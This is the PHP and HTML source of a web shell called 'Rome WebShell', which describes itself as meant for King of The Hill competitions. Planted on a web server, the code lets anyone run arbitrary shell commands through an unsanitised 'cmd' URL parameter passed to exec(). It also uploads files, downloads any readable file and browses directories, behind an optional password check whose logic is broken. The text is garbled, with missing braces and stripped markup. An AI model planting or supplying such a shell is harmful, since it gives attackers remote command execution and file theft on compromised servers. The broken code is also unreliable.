// Password protection, useful for King of The Hill games
$pass=''; // Set to null to disable; Set to string to enable, must be the sha512 hash of the password.

if($pass != null) {
if (isset($_COOKIE['pass'])) { // We use cookies and not url parameter for security reasons
// As it is likely that URL parameters are logged by the webserver, thus revealing the password
if (hash('sha512', $_COOKIE['pass']) !== $pass) {
echo "Wrong password !";
} else {
echo "Wrong password !";

// Upload file to the server
if (isset($_POST['upload'])) {
$desinationDir = getDir();
$destinationFile = $desinationDir.'/'.basename($_FILES['file']['name']);

if (file_exists($destinationFile)) {
echo "<script>alert('Error: File already exists !')</script>";
else if (move_uploaded_file($_FILES['file']['tmp_name'], $destinationFile)) {
echo "<script>alert('File uploaded successfuly !')</script>";
} else {
echo "<script>alert('Error: Could not upload file !')</script>";


// Download a file from the server
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (file_exists($file)) {
if (is_readable($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: '.filesize($file));
} else {
echo "<script>alert('Error: Could not read the file !')</script>";

function printPerms($file) {
$mode = fileperms($file);
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return $s;

function formatSizeUnits($bytes) {
if ($bytes >= 1073741824)
$bytes = number_format($bytes / 1073741824, 2) . ' GB';
elseif ($bytes >= 1048576)
$bytes = number_format($bytes / 1048576, 2) . ' MB';
elseif ($bytes >= 1024)
$bytes = number_format($bytes / 1024, 2) . ' KB';
elseif ($bytes > 1)
$bytes = $bytes . ' bytes';
elseif ($bytes == 1)
$bytes = $bytes . ' byte';
$bytes = '0 bytes';

return $bytes;

function getDir() {
return isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();

function makeFileName($file) {
if (is_dir(getDir().'/'.$file)) {
return '<a href="'.$_SERVER['PHP_SELF'].'?dir='.realpath(getDir().'/'.$file).'">'.$file.'</a>';
} else {
return '<a href="'.$_SERVER['PHP_SELF'].'?download='.realpath(getDir().'/'.$file).'">'.$file.'</a>';

function getFiles() {
$files = scandir(getDir());

$even = true;
if ($files != null) {
foreach($files as $filename){
//Simply print them out onto the screen.
echo '<tr style="background-color:'.($even ? '#515151' : '#414141').';">';
echo '<td style="font-weight:'.(is_dir(getDir().'/'.$filename) ? 'bold' : 'thin').';">'.makeFileName($filename).'';
echo ''.posix_getpwuid(fileowner(getDir().'/'.$filename))['name'].'';
echo ''.printPerms(getDir().'/'.$filename).'';
echo ''.formatSizeUnits(filesize(getDir().'/'.$filename)).'';
echo '';
$even = !$even;
} else {
echo "<p>Couldn't open that directory !";

function getCmdResults() {
global $cmdresults;
global $retval;

if ($retval == 0 ) {
foreach ($cmdresults as $line) {
echo "$line \n
} else {
echo "Execution failed with error code: ".$retval;

function getCommandLine() {
$hostname = gethostname() ?? 'none';
$username = posix_getpwuid(posix_geteuid())['name'];
$dir = getDir();
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'No command';

return '<span style="color: #19c42a">'.$username.'@'.$hostname.'</span>: <span style="color: #0f7521">'.$dir.'</span>$ '.$cmd;

// Execute a command on the server

if (isset($_GET['cmd'])) {
exec('cd '.realpath(getDir()).' && '.$_GET['cmd'], $cmdresults, $retval);

<!DOCTYPE html>

<meta charset="utf-8">
Rome WebShell <title>Rome WebShell</title>

function changeDir() {
const url = ' echo $_SERVER['PHP_SELF'].'?dir='';
const path = window.prompt("Enter the path you want to naviguate to (Eg: '/home/user'): ");

if (path) window.location = (url + path);

const popupHTML = `
<div class="popup-container" id="upload-popup">
<div class="popup">
<h4>Choose a file to upload</h4>

<div class="popup-buttons">
<button type="button" onclick="hidePopup()">Cancel</button>


function showPopup() {
const body = document.getElementsByTagName('body')[0];
const bodyHTML = body.innerHTML;

body.innerHTML = popupHTML + bodyHTML;

function hidePopup() {
const body = document.getElementsByTagName('body')[0];

<body class="body-container">

> Rome Shell

<div class="nav-items">
<a onclick="showPopup()">Upload file</a>
<a onclick="changeDir()">Change Directory</a>
<div class="content-container">
<div class="explorer-panel">
<h4>Exploring: echo getDir()</h4>

<tr style="background-color:#292929;">
<th>Folder / <span style="font-weight: lighter;">File</span></th>


<div class="command-panel">
<div class="command-output">
<p> echo getCommandLine()</p>
<p> getCmdResults()</p>

<button action="submit">


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